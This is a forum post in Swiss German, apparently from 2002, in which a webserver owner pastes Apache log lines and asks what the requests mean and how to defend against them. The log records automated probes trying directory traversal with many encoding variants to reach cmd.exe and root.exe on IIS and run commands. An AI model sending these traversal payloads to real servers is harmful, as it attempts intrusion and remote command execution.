hi zäme
ich hatte auf meinem webserver (apache), trotz firewall öfters solche versuchte zugriffe (auszug aus dem logfile):
203.132.142.13 - - [23/Aug/2002:14:00:05 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:06 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:07 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:08 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:09 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:10 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:14 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:15 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:16 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:17 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:19 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:20 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:21 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:31 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:32 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:33 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
sie kamen aber von den unterschiedlichsten ips. das ist jetzt einfach so ein versuch, von dem es etwa 5 gab.
was hat das zu bedeuten? was wollte er da ausführen? wie kann ich mich dagegen schützen?
greetz ganto